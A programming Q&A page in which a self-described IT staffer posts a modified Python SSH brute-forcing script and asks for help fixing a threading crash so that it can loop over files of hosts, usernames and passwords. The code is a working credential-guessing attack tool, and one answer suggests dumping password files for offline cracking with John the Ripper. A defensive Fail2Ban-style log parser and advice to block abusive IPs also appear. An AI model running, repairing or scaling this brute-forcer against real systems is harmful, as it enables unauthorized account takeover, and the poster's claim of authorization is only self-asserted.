user1319402

Reputation: 31

Python issue with multiple loops and thread

I'm not a Python programmer, but I got a snippet of code that was working perfectly, and I need to modify it to loop through files, get some data and do the same task. Apparently it works fine, but at the end of the first line obtained it crashes like this:

python x.py -H SSH-Hosts.txt -U Users.txt -P passlist.txt

*************************************
*SSH Bruteforcer Ver. 0.2           *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*[email protected]                 *
*************************************

Username file: Users.txt
Password file: passlist.txt
*************************************


HOST: 192.168.1.3
Username: bob
Trying password...
zzzzzz


Username: john
Trying password...

Traceback (most recent call last):
  File "x.py", line 146, in <module>
    test(sys.argv[1:])
  File "x.py", line 139, in test
    test_thread(name)
  File "x.py", line 81, in test_thread
    thread.join()
Zxcvbnm

The application is a small tool that tests for weak SSH accounts. We were the target of several brute-force attacks recently and we blocked all of them, but we also want to test periodically for weak accounts. Since the applications available (such as Medusa) crashed, I decided to modify this one, which works fine on our systems, but passing host by host and user by user is not very realistic for us. It's NOT an unauthorized test; I'm a member of IT and we are doing it to prevent BREACHES!

import thread
import time
from threading import Thread
import sys, os, threading, time, traceback, getopt
import paramiko
import terminal

global adx
global port

adx="1"
port=22
data=[]
i=[]

term = terminal.TerminalController()
paramiko.util.log_to_file('demo.log')

print "\n*************************************"
print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+"           *"
print "*Coded by Christian Martorella      *"
print "*Edge-Security Research             *"
print "*[email protected]                 *"
print "*************************************\n"

def usage():
    print "Usage: brutessh.py options \n"
    print "       -H: file with hosts\n"
    print "       -U: file with usernames\n"
    print "       -P: password file \n"
    print "       -p: port (default 22) \n"
    print "       -t: threads (default 12, more could be bad)\n\n"
    print "Example:  brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n"
    sys.exit()

class force(Thread):
    def __init__( self, name ):
        Thread.__init__(self)
        self.name = name

    def run(self):
        global adx
        if adx == "1":
            passw=self.name.split("\n")[0]
            t = paramiko.Transport(hostname)
            try:
                t.start_client()
            except Exception:
                x = 0

            try:
                t.auth_password(username=username,password=passw)
            except Exception:
                x = 0

            if t.is_authenticated():
                print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL
                t.close()
                adx = "0"
            else:
                print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL
                t.close()
        time.sleep(0)
        i[0]=i[0]-1


def test_thread(names):
    i.append(0)
    j=0
    while len(names):
        try:
            if i[0]<th:
                n = names.pop(0)
                i[0]=i[0]+1
                thread=force(n)
                thread.start()
                j=j+1
        except KeyboardInterrupt:
            print "Attack suspended by user..\n"
            sys.exit()
    thread.join()

def test(argv):
    global th
    global hostname
    global username
    th = 12
    if len(sys.argv) < 3:
        usage()
    try :
        opts, args = getopt.getopt(argv,"H:U:P:p:t:")
    except getopt.GetoptError:
        usage()
    for opt,arg in opts :
        if opt == '-U':
            username = arg
        elif opt == '-H':
            hostname =arg
        elif opt == '-P':
            password = arg
        elif opt == '-p':
            port = arg
        elif opt == "-t":
            th = arg

    try:
        h = open(hostname, 'r')
    except:
        print "Can't open file with hostnames\n"
        sys.exit()

    try:
        u = open(username, "r")
    except:
        print "Can't open username file\n"
        sys.exit()

    try:
        f = open(password, "r")
    except:
        print "Can't open password file\n"
        sys.exit()

    print term.RED + "Username file: " +term.NORMAL + username +  "\n" +term.RED + "Password file: " +term.NORMAL+ password
    print "*************************************\n\n"

    hostfile = h.readlines()
    for hostname in hostfile:

        print "HOST: " + hostname.rstrip('\n')
        userfile = u.readlines()
        for username in userfile:

            print "Username: " + username.rstrip('\n')

            print "Trying password...\n"
            name = f.readlines()
            #starttime = time.clock()
            test_thread(name)
            #stoptime = time.clock()
            #print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime)
            print "\n"

if __name__ == "__main__":
    try:
        test(sys.argv[1:])
    except KeyboardInterrupt:
        print "Attack suspended by user...\n"
        sys.exit()

How to fix this issue?

Thank you.

Upvotes: 1

Views: 419

Answers (2)

01100110

Reputation: 2344

Since you have access to the machines, you would be much better off to dump the passwd files and use John the Ripper to find weak accounts. Offline password attacks are far, far faster than online attacks. You should also consider running Fail2Ban, or something similar, which will automatically block SSH brute force attacks by blocking abusive IPs.

Upvotes: 1
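
How a Fail2Ban-style check picks out abusive IPs, as an added example that is not part of the answer above and not Fail2Ban's own code: it counts sshd "Failed password" lines per source address inside a sliding time window. The log lines are constructed samples, and `find_abusive_ips` with its `maxretry`/`findtime` parameters (named after Fail2Ban's settings) is illustrative.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd log lines (documentation IP ranges, not real data).
SAMPLE_LOG = """\
Mar 14 10:15:01 gw sshd[2101]: Failed password for invalid user bob from 203.0.113.7 port 51234 ssh2
Mar 14 10:15:03 gw sshd[2101]: Failed password for invalid user john from 203.0.113.7 port 51236 ssh2
Mar 14 10:15:04 gw sshd[2107]: Failed password for root from 198.51.100.20 port 40022 ssh2
Mar 14 10:15:06 gw sshd[2101]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar 14 10:15:09 gw sshd[2110]: Accepted password for alice from 192.0.2.15 port 50111 ssh2
Mar 14 10:15:10 gw sshd[2101]: Failed password for admin from 203.0.113.7 port 51244 ssh2
Mar 14 10:40:00 gw sshd[2130]: Failed password for root from 198.51.100.20 port 40100 ssh2
Mar 14 11:05:00 gw sshd[2150]: Failed password for root from 198.51.100.20 port 40180 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_abusive_ips(log_text, maxretry=3, findtime=600, year=2024):
    """Return {ip: sorted usernames tried} for every IP that reaches
    `maxretry` failed logins inside any `findtime`-second window."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(deque)   # ip -> failure timestamps still in window
    users = defaultdict(set)      # ip -> every username it failed against
    flagged = set()
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and other lines are ignored
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        users[ip].add(m["user"])
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= maxretry:
            flagged.add(ip)
    return {ip: sorted(users[ip]) for ip in sorted(flagged)}

if __name__ == "__main__":
    for ip, tried in find_abusive_ips(SAMPLE_LOG).items():
        print(f"{ip}: ban candidate, usernames tried: {', '.join(tried)}")
```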

corn3lius

Reputation: 4985

import thread
...
from threading import Thread

Not sure why you decided to import two classes with almost identical names. Seems dangerous!

I think you need Thread.join() not thread.join() since threading has a join call but the thread does not.

Upvotes: 1
